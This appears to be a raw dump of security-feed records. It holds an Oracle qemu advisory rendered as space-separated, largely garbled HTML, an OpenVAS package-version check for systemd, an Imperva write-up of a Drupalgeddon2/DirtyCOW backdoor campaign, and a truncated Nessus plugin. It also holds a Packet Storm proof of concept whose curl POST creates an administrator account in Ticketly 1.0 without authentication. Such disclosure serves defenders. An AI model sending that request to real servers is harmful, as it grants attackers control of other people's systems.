d > t d > q e m u - c o m m o n - 3 . 0 . 0 - 1 . e l 7 . a a r c h 6 4 . r p m / t d > t d > c c 3 9 d 0 0 a d 3 b 2 3 e c f 1 e 4 1 6 1 0 5 0 3 e c 8 e 0 4 / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > q e m u - i m g - 3 . 0 . 0 - 1 . e l 7 . a a r c h 6 4 . r p m / t d > t d > c 0 2 6 c e 2 9 b 6 2 3 6 e 7 4 d d 4 1 a c b 0 f 8 e 2 b 6 1 f / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > q e m u - k v m - 3 . 0 . 0 - 1 . e l 7 . a a r c h 6 4 . r p m / t d > t d > a c b b c 5 2 c d 2 4 2 2 7 b 8 a 0 1 3 0 f d 8 5 e 0 0 b d 1 3 / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > q e m u - k v m - c o r e - 3 . 0 . 0 - 1 . e l 7 . a a r c h 6 4 . r p m / t d > t d > 9 2 9 8 f 0 3 b c b 2 4 3 b e 1 5 e a e b b 2 7 6 f c 9 9 2 7 a / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > q e m u - s y s t e m - a a r c h 6 4 - 3 . 0 . 0 - 1 . e l 7 . a a r c h 6 4 . r p m / t d > t d > 3 9 5 2 7 4 9 8 d 3 2 1 e 2 6 e d a a c d 4 b a e 4 c 3 4 e d 7 / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > q e m u - s y s t e m - a a r c h 6 4 - c o r e - 3 . 0 . 0 - 1 . e l 7 . a a r c h 6 4 . r p m / t d > t d > 1 1 1 7 6 5 b 2 6 0 c 5 4 a 9 e 9 f f 7 1 8 2 1 3 1 e a 0 3 a a / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d c o l s p a n = \" 4 \" > / t d > / t r > t r > t d > O r a c l e L i n u x 7 ( x 8 6 _ 6 4 ) / t d > t d > q e m u - 3 . 0 . 0 - 1 . e l 7 . s r c . r p m / t d > t d > 6 0 0 a b 7 a 2 5 2 5 0 5 7 e 7 b 8 4 a a 5 e 3 4 5 4 a 9 c 8 b / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > q e m u - 3 . 0 . 0 - 1 . e l 7 . x 8 6 _ 6 4 . r p m / t d > t d > 9 8 7 f a a 4 5 5 e 4 c 2 6 3 9 5 7 6 7 e 2 a 0 8 3 6 6 b 5 1 b / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > q e m u - b l o c k - g l u s t e r - 3 . 0 . 0 - 1 . e l 7 . x 8 6 _ 6 4 . r p m / t d > t d > 2 8 f 9 d 4 d f d 0 f b a b 2 8 4 0 4 b 0 e c 8 6 c 1 6 4 8 d 3 / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > q e m u - b l o c k - i s c s i - 3 . 0 . 0 - 1 . e l 7 . x 8 6 _ 6 4 . r p m / t d > t d > f 5 a 1 f 1 9 a b 6 9 4 5 4 3 0 f a 5 a 2 9 e f a b a 6 a 5 4 c / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > q e m u - b l o c k - r b d - 3 . 0 . 0 - 1 . e l 7 . x 8 6 _ 6 4 . r p m / t d > t d > 3 4 0 0 a a 2 a 3 e 0 7 7 3 4 e a 0 a a a e 2 8 e c a 3 a 2 9 6 / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > q e m u - c o m m o n - 3 . 0 . 0 - 1 . e l 7 . x 8 6 _ 6 4 . r p m / t d > t d > 5 4 7 9 e 4 2 0 d 9 b 1 a 2 c c 7 f c 0 6 7 d 2 6 a e d 0 4 c e / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > q e m u - i m g - 3 . 0 . 0 - 1 . e l 7 . x 8 6 _ 6 4 . r p m / t d > t d > 3 6 0 d 0 8 9 2 6 0 7 6 c 3 8 7 2 1 7 0 6 3 6 f 2 d 9 3 6 1 a 6 / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > q e m u - k v m - 3 . 0 . 0 - 1 . e l 7 . x 8 6 _ 6 4 . r p m / t d > t d > 8 0 5 7 9 d 4 b b 7 a b a 7 d 4 0 9 0 1 2 a 4 a 6 2 9 2 b 5 a f / t d > t d > a h r e f = # > - / a > / t d > / t r > t r > t d > / t d > t d > q e m u - k v m - c o r e - 3 . 0 . 0 - 1 . e l 7 . x 8 6 _ 6 4 . r p m / t d > t d > 0 a e 0 3 a 0 1 2 e 1 b b d 1 2 3 5 f e 2 2 c d 1 8 d f d f b d / t d > t d > a h r e f = # > - / a > / t d > / t r > \n / t b o d y > / t a b l e > \n \n \n b r > b r > \n b r > p > \n T h i s p a g e i s g e n e r a t e d a u t o m a t i c a l l y a n d h a s n o t b e e n c h e c k e d f o r e r r o r s o r o m i s s i o n s . F o r c l a r i f i c a t i o n \n o r c o r r e c t i o n s p l e a s e c o n t a c t t h e a h r e f = \" h t t p s : / / l i n u x . o r a c l e . c o m / \" > O r a c l e L i n u x U L N t e a m / a > / p > \n \n \n \n / d i v > \n ! - - \n / d i v > \n - - > \n / d i v > \n / d i v > \n \n \n d i v i d = \" m c 1 6 \" c l a s s = \" m c 1 6 v 0 \" > \n d i v c l a s s = \" m c 1 6 w 1 \" > \n h 2 > T e c h n i c a l i n f o r m a t i o n / h 2 > \n u l > \n l i > a h r e f = \" h t t p s : / / l i n u x . o r a c l e . c o m / h a r d w a r e - c e r t i f i c a t i o n s \" t a r g e t = \" _ b l a n k \" > O r a c l e L i n u x C e r t i f i e d H a r d w a r e / a > / l i > \n l i > a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / u s / s u p p o r t / l i b r a r y / e l s p - l i f e t i m e - 0 6 9 3 3 8 . p d f \" > O r a c l e L i n u x S u p p o r t e d R e l e a s e s / a > / l i > \n / u l > \n / d i v > \n \n d i v c l a s s = \" m c 1 6 w 1 \" > \n h 2 > O r a c l e L i n u x S u p p o r t / h 2 > \n u l > \n l i > a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / u s / t e c h n o l o g i e s / l i n u x / O r a c l e L i n u x S u p p o r t / i n d e x . h t m l \" t a r g e t = \" _ b l a n k \" > O r a c l e L i n u x S u p p o r t / a > / l i > \n l i > a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / u s / s u p p o r t / p r e m i e r / s e r v e r s - s t o r a g e / o v e r v i e w / i n d e x . h t m l \" t a r g e t = \" _ b l a n k \" > O r a c l e P r e m i e r S u p p o r t f o r S y s t e m s / a > / l i > \n l i > a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / u s / s u p p o r t / a d v a n c e d - c u s t o m e r - s e r v i c e s / o v e r v i e w / \" > A d v a n c e d C u s t o m e r S e r v i c e s / a > / l i > \n / u l > \n / d i v > \n \n d i v c l a s s = \" m c 1 6 w 2 \" > \n h 2 > C o n n e c t / h 2 > \n u l > \n l i c l a s s = \" f b i c o n \" > a h r e f = \" h t t p : / / w w w . f a c e b o o k . c o m / o r a c l e l i n u x \" t i t l e = \" F a c e b o o k \" n a m e = \" F a c e b o o k \" t a r g e t = \" _ b l a n k \" i d = \" F a c e b o o k \" > F a c e b o o k / a > / l i > \n l i c l a s s = \" t w i c o n \" > a h r e f = \" h t t p : / / w w w . t w i t t e r . c o m / O r a c l e L i n u x \" t i t l e = \" T w i t t e r \" n a m e = \" T w i t t e r \" t a r g e t = \" _ b l a n k \" i d = \" T w i t t e r \" > T w i t t e r / a > / l i > \n l i c l a s s = \" i n i c o n \" > a h r e f = \" h t t p : / / w w w . l i n k e d i n . c o m / g r o u p s ? g i d = 1 2 0 2 3 8 \" t i t l e = \" L i n k e d I n \" n a m e = \" L i n k e d I n \" t a r g e t = \" _ b l a n k \" i d = \" L i n k e d I n \" > L i n k e d I n / a > / l i > \n l i c l a s s = \" y t i c o n \" > a h r e f = \" h t t p : / / w w w . y o u t u b e . c o m / o r a c l e l i n u x c h a n n e l \" t i t l e = \" Y o u T u b e \" n a m e = \" Y o u T u b e \" t a r g e t = \" _ b l a n k \" i d = \" Y o u T u b e \" > Y o u T u b e / a > / l i > \n l i c l a s s = \" b l o g i c o n \" > a h r e f = \" h t t p : / / b l o g s . o r a c l e . c o m / l i n u x \" t i t l e = \" B l o g \" n a m e = \" B l o g \" > B l o g / a > / l i > \n / u l > \n / d i v > \n \n d i v c l a s s = \" m c 1 6 w 3 \" > \n h 2 > C o n t a c t U s / h 2 > \n u l > \n l i > a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / u s / c o r p o r a t e / c o n t a c t / g l o b a l - 0 7 0 5 1 1 . h t m l \" > G l o b a l c o n t a c t s / a > / l i > \n l i > O r a c l e 1 - 8 0 0 - 6 3 3 - 0 6 9 1 / l i > \n / u l > \n / d i v > \n / d i v > \n / d i v > \n \n d i v i d = \" m c 0 4 \" c l a s s = \" m c 0 4 v 1 \" > \n d i v c l a s s = \" m c 0 4 w 1 \" > \n a h r e f = \" h t t p : / / o r a c l e . c o m \" > i m g s r c = \" / / w w w . o r a c l e i m g . c o m / a s s e t s / m c 0 4 - f o o t e r - l o g o . p n g \" b o r d e r = \" 0 \" a l t = \" s o f t w a r e . h a r d w a r e . c o m p l e t e \" / > / a > \n / d i v > \n \n d i v c l a s s = \" m c 0 4 w 2 \" > \n a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / s u b s c r i b e / i n d e x . h t m l \" > S u b s c r i b e / a > | a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / c o r p o r a t e / e m p l o y m e n t / i n d e x . h t m l \" > C a r e e r s / a > | a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / c o r p o r a t e / c o n t a c t / i n d e x . h t m l \" > C o n t a c t U s / a > | a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / h t m l / c o p y r i g h t . h t m l \" > L e g a l N o t i c e s / a > | a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / h t m l / t e r m s . h t m l \" > T e r m s o f U s e / a > | a h r e f = \" h t t p : / / w w w . o r a c l e . c o m / h t m l / p r i v a c y . h t m l \" > Y o u r P r i v a c y R i g h t s / a > \n / d i v > \n / d i v > \n / d i v > \n / b o d y > \n / h t m l > \n ", "edition": 1, "reporter": "Oracle", "published": "2018-11-20T00:00:00", "title": "qemu security update", "type": "oraclelinux", "enchantments": {"score": {"modified": "2018-11-21T03:01:50", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-16845", "CVE-2017-15124", "CVE-2017-15268", "CVE-2018-5683", "CVE-2018-15746", "CVE-2017-9503", "CVE-2017-5753", "CVE-2017-5754", "CVE-2017-8112", "CVE-2017-7493", "CVE-2018-11806", "CVE-2017-11334", "CVE-2018-12617", "CVE-2017-15119", "CVE-2018-10839", "CVE-2017-1367", "CVE-2017-8379", "CVE-2017-15038", "CVE-2017-14167", "CVE-2017-13673", "CVE-2017-15289", "CVE-2017-8380", "CVE-2017-8309", "CVE-2017-12809", "CVE-2017-13711", "CVE-2017-5715", "CVE-2017-2630", "CVE-2017-18030", "CVE-2018-17963", "CVE-2017-17381", "CVE-2017-7471", "CVE-2017-2633", "CVE-2017-10806", "CVE-2017-13672", "CVE-2018-17962", "CVE-2018-7550", "CVE-2017-18043", "CVE-2018-17958", "CVE-2018-3639", "CVE-2018-7858"], "modified": "2018-11-20T00:00:00", "id": "ELSA-2018-4285", "href": "http://linux.oracle.com/errata/ELSA-2018-4285.html", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-11-20T11:19:44", "references": ["https://lists.debian.org/debian-lts-announce/2018/11/msg00017.html"], "pluginID": "1361412562310891580", "description": "systemd was found to suffer from multiple security vulnerabilities\nranging from denial of service attacks to possible root privilege\nescalation.\n\nCVE-2018-1049\n\nA race condition exists between .mount and .automount units such\nthat automount requests from kernel may not be serviced by systemd\nresulting in kernel holding the mountpoint and any processes that\ntry to use said mount will hang. A race condition like this may\nlead to denial of service, until mount points are unmounted.\n\nCVE-2018-15686\n\nA vulnerability in unit_deserialize of systemd allows an attacker\nto supply arbitrary state across systemd re-execution via\nNotifyAccess. This can be used to improperly influence systemd\nexecution and possibly lead to root privilege escalation.\n\nCVE-2018-15688\n\nA buffer overflow vulnerability in the dhcp6 client of systemd\nallows a malicious dhcp6 server to overwrite heap memory in\nsystemd-networkd, which is not enabled by default in Debian.", "edition": 1, "reporter": "Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net", "published": "2018-11-20T00:00:00", "title": "Debian LTS Advisory ([SECURITY] [DLA 1580-1] systemd security update)", "type": "openvas", "enchantments": {"score": {"modified": "2018-11-20T11:19:44", "vector": "NONE", "value": 7.5}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-15686", "CVE-2018-1049", "CVE-2018-15688"], "modified": "2018-11-20T00:00:00", "id": "OPENVAS:1361412562310891580", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891580", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_dla_1580.nasl 12429 2018-11-20 06:50:07Z cfischer $\n#\n# Auto-generated from advisory DLA 1580-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891580\");\n script_version(\"$Revision: 12429 $\");\n script_cve_id(\"CVE-2018-1049\", \"CVE-2018-15686\", \"CVE-2018-15688\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 1580-1] systemd security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-20 07:50:07 +0100 (Tue, 20 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-11-20 00:00:00 +0100 (Tue, 20 Nov 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/11/msg00017.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\\.[0-9]+\");\n script_tag(name:\"affected\", value:\"systemd on Debian Linux\");\n script_tag(name:\"insight\", value:\"systemd is a replacement for sysvinit. It is dependency-based and\nable to read the LSB init script headers in addition to parsing rcN.d\nlinks as hints.\");\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n215-17+deb8u8.\n\nWe recommend that you upgrade your systemd packages.\");\n script_tag(name:\"summary\", value:\"systemd was found to suffer from multiple security vulnerabilities\nranging from denial of service attacks to possible root privilege\nescalation.\n\nCVE-2018-1049\n\nA race condition exists between .mount and .automount units such\nthat automount requests from kernel may not be serviced by systemd\nresulting in kernel holding the mountpoint and any processes that\ntry to use said mount will hang. A race condition like this may\nlead to denial of service, until mount points are unmounted.\n\nCVE-2018-15686\n\nA vulnerability in unit_deserialize of systemd allows an attacker\nto supply arbitrary state across systemd re-execution via\nNotifyAccess. This can be used to improperly influence systemd\nexecution and possibly lead to root privilege escalation.\n\nCVE-2018-15688\n\nA buffer overflow vulnerability in the dhcp6 client of systemd\nallows a malicious dhcp6 server to overwrite heap memory in\nsystemd-networkd, which is not enabled by default in Debian.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"gir1.2-gudev-1.0\", ver:\"215-17+deb8u8\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgudev-1.0-0\", ver:\"215-17+deb8u8\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgudev-1.0-dev\", ver:\"215-17+deb8u8\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libpam-systemd\", ver:\"215-17+deb8u8\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libsystemd-daemon-dev\", ver:\"215-17+deb8u8\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libsystemd-daemon0\", ver:\"215-17+deb8u8\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libsystemd-dev\", ver:\"215-17+deb8u8\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libsystemd-id128-0\", ver:\"215-17+deb8u8\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libsystemd-id128-dev\", ver:\"215-17+deb8u8\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libsystemd-journal-dev\", ver:\"215-17+deb8u8\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libsystemd-journal0\", ver:\"215-17+deb8u8\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libsystemd-login-dev\", ver:\"215-17+deb8u8\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libsystemd-login0\", ver:\"215-17+deb8u8\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libsystemd0\", ver:\"215-17+deb8u8\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libudev-dev\", ver:\"215-17+deb8u8\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libudev1\", ver:\"215-17+deb8u8\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"python3-systemd\", ver:\"215-17+deb8u8\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"systemd\", ver:\"215-17+deb8u8\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"systemd-dbg\", ver:\"215-17+deb8u8\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"systemd-sysv\", ver:\"215-17+deb8u8\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"udev\", ver:\"215-17+deb8u8\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2018-11-21T02:21:06", "references": [], "description": "", "edition": 1, "reporter": "Javier Olmedo", "published": "2018-11-20T00:00:00", "title": "Ticketly 1.0 Cross Site Request Forgery", "type": "packetstorm", "enchantments": {"score": {"modified": "2018-11-21T02:21:06", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-18922"], "modified": "2018-11-20T00:00:00", "id": "PACKETSTORM:150401", "href": "https://packetstormsecurity.com/files/150401/Ticketly-1.0-Cross-Site-Request-Forgery.html", "sourceData": "`# Exploit Title: Ticketly 1.0 - Cross-Site Request Forgery (Add Admin) \n# Exploit Author: Javier Olmedo \n# Website: https://hackpuntes.com \n# Date: 2018-11-19 \n# Google Dork: N/A \n# Vendor: Abisoft (https://abisoftgt.net) \n# Software Link: https://abisoftgt.net/software/6/sistema-de-tickets-y-soporte-con-php-y-mysql \n# Affected Version: 1.0 \n# Patched Version: unpatched \n# Category: Web Application \n# Platform: Windows & Ubuntu \n# Tested on: Win10x64 & Kali Linux \n# CVE: N/A \n# 4. References: \n# https://hackpuntes.com/cve-2018-18922-ticketly-1-0-escalacion-de-privilegios-crear-cuenta-administrador/ \n \n# 1. Technical Description: \n# Ticketly version 1.0 are affected by a privilege escalation vulnerability, \n# an attacker could create an administrator user account by sending a POST \n# request to the resource /action/add_user.php without authentication. \n \n# 2. Proof Of Concept (PoC): \n# Send request curl: \ncurl -i -s -k -X $'POST' \\ \n-H $'Host: [HOST]' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Content-Length: 82' \\ \n--data-binary $'name=[NAME]&lastname=[LASTNAME]&email=[EMAIL]&status=1&password=[PASS]' \\ \n$'http://[PATH]/action/add_user.php' \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150401/ticketly10-xsrf.txt"}], "impervablog": [{"lastseen": "2018-11-19T20:51:43", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"], "references": [], "description": "In this post we\u2019ll unpack a short -- but no less serious -- attack that affected some Linux-based systems, on October 31. Throughout the campaign, the attacker used a chain of vulnerabilities including the infamous [Drupalgeddon2](<https://www.imperva.com/blog/drupalgeddon-2-0-are-hackers-slacking-off/>) and [DirtyCOW](<https://dirtycow.ninja/>), and system misconfigurations to **persistently** infect vulnerable Drupal web servers and take over user machines.\n\nIn the past, remote code execution (RCE) attacks on web servers were usually once-off security events - attackers would run their malicious code, and that was it. If the process was detected and terminated, or if the administrator restarted the web servers, the attack would stop. \n\nIncreasingly, attackers are opting for **persistent** attacks. Persistency means that the attacker has a technique to easily re-infect a vulnerable server in case the process is terminated or after a server restart, or run an additional malicious code. Persistency is achieved through different techniques and usually depends on the type of operating system. \n\n## Exploiting SSH in Linux\n\nIn the case of Linux-based systems, one of the favorite techniques used by attackers is opening a communication channel through SSH and transmitting malicious commands. This technique assumes that an SSH service is installed in the target system. But what happens if it isn\u2019t? Well, then the attacker would somehow need to install it themselves.\n\nIn our case, the attack surface was the [web application](<https://www.imperva.com/products/application-security/>). This means that the attacker\u2019s code was running under the user and permissions of the web application. Usually, the web server user (e.g. nobody, www-data etc.) has minimal permissions and can\u2019t install new services. What if the attacker could change its user context and get sufficient permissions? What if the attacker changed the user to \u2018**root**\u2019? This will certainly help\u2026\n\nFirst, the attacker builds a word list by locating all of Drupal\u2019s settings files and extracting any line with the word \u201cpass\u201d in it.\n\n![](https://www.imperva.com/blog/wp-content/uploads/sites/9/2018/11/dirtycow1.png)\n\nThis technique can be quite useful as many administrators leave \u2018root\u2019 as the default user to connect from the web application to the database.\n\n![](https://www.imperva.com/blog/wp-content/uploads/sites/9/2018/11/dirtycow2.png)\n\nThen, armed with a potential list of passwords, the attacker tries to use the operating system command \u2018su root\u2019 to change the user to root.\n\n![](https://www.imperva.com/blog/wp-content/uploads/sites/9/2018/11/dirtycow3.png)\n\nIf the attacker succeeds in changing the user, they can proceed to download the secondary payload \u2018sshdstuff\u2019 and execute (more details below).\n\nIf the administrator was careful and didn\u2019t leave root passwords in the configuration files, this technique fails, and the attacker tries to exploit the DirtyCOW bug to escalate their privileges to root. The attacker downloads three different implementations of DirtyCOW and runs them one after the other. One of the implementations is downloaded in its raw format (C source code file) and is compiled at runtime. Surprisingly, one of the implementations of this two-year-old bug has **zero** detection rate in VirusTotal.\n\n![](https://www.imperva.com/blog/wp-content/uploads/sites/9/2018/11/dirtycow4.png)\n\nFinally, when the attacker switches to the root user and has permissions to install new services, they install SSH, configure it and add their key to the list of authorized keys by the service. Now, as long as the machine is up and running, the attacker can remotely transmit any command as the user **root** - game over.\n\n![](https://www.imperva.com/blog/wp-content/uploads/sites/9/2018/11/dirtycow5.png)\n\n## Mitigation suggestions\n\nAdministrators should make sure that their web application is fully patched as well as the operating system of the host. Alternately, it is possible to use external cybersecurity solution, like a WAF, to block the attack before it reaches the server. Imperva customers are protected out of the box. \n\nThe post [DirtyCOW Bug Drives Attackers to A Backdoor in Vulnerable Drupal Web Servers](<https://www.imperva.com/blog/dirtycow-bug-drives-attackers-to-a-backdoor-in-vulnerable-drupal-web-servers/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "reporter": "Nadav Avital", "published": "2018-11-19T12:30:58", "type": "impervablog", "title": "DirtyCOW Bug Drives Attackers to A Backdoor in Vulnerable Drupal Web Servers", "enchantments": {"score": {"modified": "2018-11-19T20:51:43", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-11-19T12:30:58", "id": "IMPERVABLOG:626B7ECC637EFF1532ED0EDC094E42F9", "href": "https://www.imperva.com/blog/dirtycow-bug-drives-attackers-to-a-backdoor-in-vulnerable-drupal-web-servers/", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2018-11-20T03:39:36", "references": ["https://bugzilla.suse.com/show_bug.cgi?id=1102682", "https://www.suse.com/security/cve/CVE-2018-14633/", "https://www.suse.com/security/cve/CVE-2018-5390/", "http://www.nessus.org/u?8a631f40", "https://bugzilla.suse.com/show_bug.cgi?id=1107832"], "pluginID": "119034", "description": "This update for the Linux Kernel 4.4.121-92_98 fixes several issues.\n\nThe following security issues were fixed :\n\nCVE-2018-14633: A security flaw was found in the chap_server_compute_md5() function in the ISCSI target code in the Linux kernel in a way an authentication request from an ISCSI initiator is processed. An unauthenticated remote attacker can cause a stack buffer overflow and smash up to 17 bytes of the stack. The attack requires the iSCSI target to be enabled on the victim host.\nDepending on how the target's code was built (i.e. depending on a compiler, compile flags and hardware architecture) an attack may lead to a system crash and thus to a denial-of-service or possibly to a non-authorized access to data exported by an iSCSI target. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is highly unlikely (bsc#1107832).\n\nCVE-2018-5390: Fixed the possiblilty that the kernel can be forced to make very expensive calls to tcp_collapse_ofo_queue() and tcp_prune_ofo_queue() for every incoming packet which can lead to a denial of service (bnc#1102682).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 1, "reporter": "Tenable", "published": "2018-11-19T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2018:3789-1)", "type": "nessus", "enchantments": {"score": {"modified": "2018-11-20T03:39:36", "vector": "NONE", "value": 7.5}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14633", "CVE-2018-5390"], "modified": "2018-11-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kgraft-patch-4_4_121-92_98-default", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2018-3789-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=119034", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:3789-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119034);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/11/19 11:02:40\");\n\n script_cve_id(\"CVE-2018-14633\", \"CVE-2018-5390\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2018:3789-1)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 